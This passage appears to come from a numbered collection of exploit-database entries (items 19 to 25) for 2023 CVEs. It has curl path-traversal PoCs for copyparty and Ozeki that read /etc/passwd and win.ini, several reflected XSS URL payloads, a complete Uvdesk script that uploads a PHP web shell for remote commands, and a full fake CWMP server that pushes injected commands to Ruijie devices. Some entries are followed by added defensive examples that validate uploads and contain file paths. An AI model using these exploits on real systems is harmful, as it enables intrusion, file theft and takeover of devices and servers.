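Run the check against the real encoded shellcode before pasting: the encoder guarantees the shellcode is free of the listed bytes, but the gadget address and the padding are chosen by hand and are the usual place a stray `\x00` or `\x0a` slips in.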
19. # Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474

#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

#POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
20. # Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Date: 2023.Aug.01
# Exploit Author: Pedro (ISSDU TW)
# Vendor Homepage: https://loganalyzer.adiscon.com/
# Software Link: https://loganalyzer.adiscon.com/download/
# Version: v4.1.13 and before
# Tested on: Linux
# CVE : CVE-2023-36306

There are several installation methods.
If you installed without a database (file-based), no login is needed.
If you installed with a database, you should log in with a read-only user (at least).

XSS payloads are as below:

XSS
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
21. # Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 29/07/2023
# Vendor: The Thinkery LLC
# Vendor Homepage: http://thethinkery.net
# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/
# Demo: https://iproperty.thethinkery.net/
# Version: 4.1.1
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /iproperty/property-views/all-properties-with-map

GET parameter 'filter_keyword' is vulnerable to XSS

https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1

XSS Payload:

pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4

[-] Done
22. # Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6

import requests
import argparse


def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args


def main():
    args = get_args()
    base_url = args.url
    command = args.command

    uploaded_file = "shell.php"
    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command

    # Edit your credentials here
    login_data = {
        "_username": "admin@adm.com",
        "_password": "passwd",
        "_remember_me": "off"
    }

    # The PHP file is submitted as the "solutionImage" of a new knowledgebase folder,
    # with a client-chosen image content type
    files = {
        "name": (None, "pwn"),
        "description": (None, "xxt"),
        "visibility": (None, "public"),
        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
    }

    s = requests.session()

    # Login
    s.post(base_url + "/en/member/login", data=login_data)

    # Upload
    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)

    # Execute command
    cmd = s.get(url_cmd)
    print(cmd.text)


if __name__ == "__main__":
    main()
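The upload in the exploit above is a file named `shell.php` whose body is PHP and whose only claim to being an image is the client-chosen `image/jpg` content type. The following is an added example, not Uvdesk code: a server-side image upload check that trusts neither the filename nor the declared type, requiring an allow-listed extension, a matching magic-byte prefix, and the absence of server-side markup, and that stores the file under a random name. The sample inputs are constructed; the first reproduces what the exploit sends.

```python
"""Added example (not Uvdesk code): validate an image upload before it is stored."""
import os
import secrets

ALLOWED_IMAGES = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}
ALLOWED_TYPES = {"image/png", "image/jpeg", "image/gif"}
# Markup that must never appear in something served from a directory a PHP/ASP/JSP
# handler can see; catches polyglots that pass the magic-byte check.
ACTIVE_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def validate_image_upload(filename, content_type, data):
    """Return (ok, reason). Extension, declared type and content must all agree."""
    name = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_IMAGES:
        return False, "extension %r not allowed" % ext
    if content_type.lower() not in ALLOWED_TYPES:
        return False, "content type %r not allowed" % content_type
    if not any(data.startswith(magic) for magic in ALLOWED_IMAGES[ext]):
        return False, "content is not a %s image" % ext
    lowered = data.lower()
    if any(marker in lowered for marker in ACTIVE_MARKERS):
        return False, "embedded server-side or script markup"
    return True, "ok"


def storage_name(ext):
    """Never reuse the client's name: random basename plus the validated extension."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed samples; the first is what the exploit above submits.
    samples = [
        ("shell.php", "image/jpg", b"<?php system($_GET['cmd']); ?>"),
        ("shell.jpg", "image/jpeg", b"<?php system($_GET['cmd']); ?>"),
        ("pic.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32),
        ("poly.png", "image/png", b"\x89PNG\r\n\x1a\n<?php echo 1; ?>"),
    ]
    for fn, ct, body in samples:
        ok, why = validate_image_upload(fn, ct, body)
        print(fn, "->", "stored as " + storage_name(os.path.splitext(fn)[1].lower()) if ok else why)
```

Content validation is necessary but not sufficient: the exploit works because the upload lands under a web-served `assets/` path where the interpreter will run it. Keep uploads outside the document root or in a directory with script execution disabled, and serve them through a handler that sets the content type itself.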
23. # Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)
# Google Dork: None
# Date: July 31, 2023
# Exploit Author: Riyan Firmansyah of Seclab
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE : None

"""
Summary
=======

The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the IP address input form is not validated properly and allows the user to perform OS command injection.

On the other side, the Ruijie Reyee Cloud based device makes polling requests to the Ruijie Reyee CWMP server to ask if there is any command from the web controller that needs to be executed. After analyzing the network capture that comes from the device, the connection for the polling request to the Ruijie Reyee CWMP server is an unencrypted HTTP request.

Because of the unencrypted HTTP request that comes from the Ruijie Reyee Cloud based device, an attacker could set up a fake server using a Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that makes CWMP requests to the fake server. Once the attacker has gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
"""

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from html import escape, unescape
import http.server
import socketserver
import io
import time
import re
import argparse
import gzip

# command payload
command = "uname -a"

# change this to serve on a different port
PORT = 8080


def cwmp_inform(soap):
    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
    product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
    serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
    result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
    parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
    for parameter in parameters:
        parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
        parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
        result['parameters'][parameter_name] = parameter_value
    return result


def cwmp_inform_response():
    return """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""


def command_payload(command):
    current_time = time.time()
    result = """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
    return result


def command_response(soap):
    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
    command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
    response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
    result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
    return result


class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    protocol_version = 'HTTP/1.1'

    def do_GET(self):
        self.send_response(204)
        self.end_headers()

    def do_POST(self):
        print("[*] Got hit by", self.client_address)
        f = io.BytesIO()
        if 'service' in self.path:
            stage, info = self.parse_stage()
            if stage == "cwmp_inform":
                # First contact: the device announces itself; answer with InformResponse
                self.send_response(200)
                print("[!] Got Device information", self.client_address)
                print("[*] Product Class:", info['product_class'])
                print("[*] Serial Number:", info['serial_number'])
                print("[*] MAC Address:", info['parameters']['mac'])
                print("[*] STUN Client IP:", info['parameters']['stunclientip'])
                payload = bytes(cwmp_inform_response(), 'utf-8')
                f.write(payload)
                self.send_header("Content-Length", str(f.tell()))
            elif stage == "command_request":
                # Empty POST = the device asking for work; hand it the CLI command
                self.send_response(200)
                self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
                print("[*] Device interacting", self.client_address)
                print(info)
                payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
                f.write(payload)
                self.send_header("Content-Length", str(f.tell()))
            else:
                # ExecuteCliCommandResponse: print the command output the device sent back
                print("[*] Command response", self.client_address)
                print(unescape(info['response']))
                self.send_response(204)
                f.write(b"")
        else:
            print("[x] Received invalid request", self.client_address)
            self.send_response(204)
            f.write(b"")
        f.seek(0)
        self.send_header("Connection", "keep-alive")
        self.send_header("Content-type", "text/xml;charset=utf-8")
        self.end_headers()
        if f:
            self.copyfile(f, self.wfile)
            f.close()

    def parse_stage(self):
        content_length = int(self.headers['Content-Length'])
        post_data = gzip.decompress(self.rfile.read(content_length))
        if "cwmp:Inform" in post_data.decode("utf-8"):
            return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
        elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
            return ("command_response", command_response(post_data.decode("utf-8")))
        else:
            return ("command_request", "Ping!")

    def log_message(self, format, *args):
        return


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
                        help='Specify alternate bind address '
                             '[default: all interfaces]')
    parser.add_argument('port', action='store', default=PORT, type=int, nargs='?',
                        help='Specify alternate port [default: {}]'.format(PORT))
    args = parser.parse_args()
    Handler = CustomHTTPRequestHandler
    with socketserver.TCPServer((args.bind, args.port), Handler) as httpd:
        ip_addr = args.bind if args.bind != '' else '0.0.0.0'
        print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port))
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            pass
        httpd.server_close()

"""
Output
======

ubuntu:~$ python3 exploit.py
[!] serving fake CWMP server at 0.0.0.0:8080
[*] Got hit by ('[redacted]', [redacted])
[!] Got Device information ('[redacted]', [redacted])
[*] Product Class: EW1200G-PRO
[*] Serial Number: [redacted]
[*] MAC Address: [redacted]
[*] STUN Client IP: [redacted]:[redacted]
[*] Got hit by ('[redacted]', [redacted])
[*] Device interacting ('[redacted]', [redacted])
Ping!
[*] Got hit by ('[redacted]', [redacted])
[*] Command response ('[redacted]', [redacted])
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.300/0.335/0.400 ms
Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux
"""
24. # Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 01/08/2023
# Vendor: JLexArt
# Vendor Homepage: https://jlexart.com/
# Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/
# Demo: https://jlexguestbook.jlexart.com/
# Version: 1.6.4
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /u/perry-705

GET parameter 'q' is vulnerable to XSS

http://website/u/perry-705?q=[XSS]&wl=1

XSS Payloads:

db8ck"onfocus="confirm(1)"autofocus="xwu0k
25. # Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link: https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10

##################################### Arbitrary File Read PoC #####################################

curl https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

##################################### Arbitrary File Read PoC #####################################
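The copyparty PoC in post 19 and the Ozeki PoC above are two forms of the same mistake. copyparty's `/.cpr/%2Fetc%2Fpasswd` decodes to an absolute path, and a join that accepts an absolute second component silently discards the resource root. Ozeki's `..%252f` is a double-encoded slash: one decode yields the harmless literal `..%2f`, a second decode yields `../` and walks out of the root. The following is an added example, not copyparty or Ozeki code, covering both posts: a deliberately naive resolver that reproduces each escape, beside a resolver that decodes exactly once, anchors the join, normalises, and then proves the result is still under the root. The root directory and the `/.cpr/` mount prefix are assumptions for the example; the request paths are the two PoCs.

```python
"""Added example (not copyparty or Ozeki code): path resolution with and without containment."""
import posixpath
from urllib.parse import unquote

ROOT = "/srv/www"   # assumed document root for the example

# PoC request paths from posts 19 and 25.
COPYPARTY_POC = "/.cpr/%2Fetc%2Fpasswd"
OZEKI_POC = "/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini"


def decode(path, rounds=1):
    """Percent-decode `rounds` times; anything above one round is already a bug."""
    for _ in range(rounds):
        path = unquote(path)
    return path


def naive_resolve(root, mount, url_path, rounds=1):
    """What a vulnerable handler tends to do: strip the mount prefix, decode (sometimes
    twice), and join. posixpath.join throws root away when the remainder is absolute,
    and normpath happily walks '..' above root. No containment check."""
    remainder = url_path[len(mount):]
    return posixpath.normpath(posixpath.join(root, decode(remainder, rounds)))


def safe_resolve(root, mount, url_path):
    """Decode once, refuse NUL, fold backslashes (Windows), drop the leading slash so
    the join cannot be hijacked, normalise, then require the result to stay under root.
    Returns None for anything that must be answered with 404/400."""
    if not url_path.startswith(mount):
        return None
    decoded = decode(url_path[len(mount):], 1).replace("\\", "/")
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    base = root.rstrip("/")
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    print("copyparty naive :", naive_resolve(ROOT, "/.cpr/", COPYPARTY_POC))
    print("copyparty safe  :", safe_resolve(ROOT, "/.cpr/", COPYPARTY_POC))
    print("ozeki naive x1  :", naive_resolve(ROOT, "/", OZEKI_POC, rounds=1))
    print("ozeki naive x2  :", naive_resolve(ROOT, "/", OZEKI_POC, rounds=2))
    print("ozeki safe      :", safe_resolve(ROOT, "/", OZEKI_POC))
    print("ozeki pre-decoded, safe:", safe_resolve(ROOT, "/", decode(OZEKI_POC, 1)))
```

The containment test is the control that does not depend on guessing every encoding trick: whatever the decoder produced, the final path either starts with the root or the request is refused. On a live filesystem use `os.path.realpath` for the candidate and the root so that symlinks inside the tree cannot point out of it; `posixpath.normpath` is used here so the example runs without touching the disk.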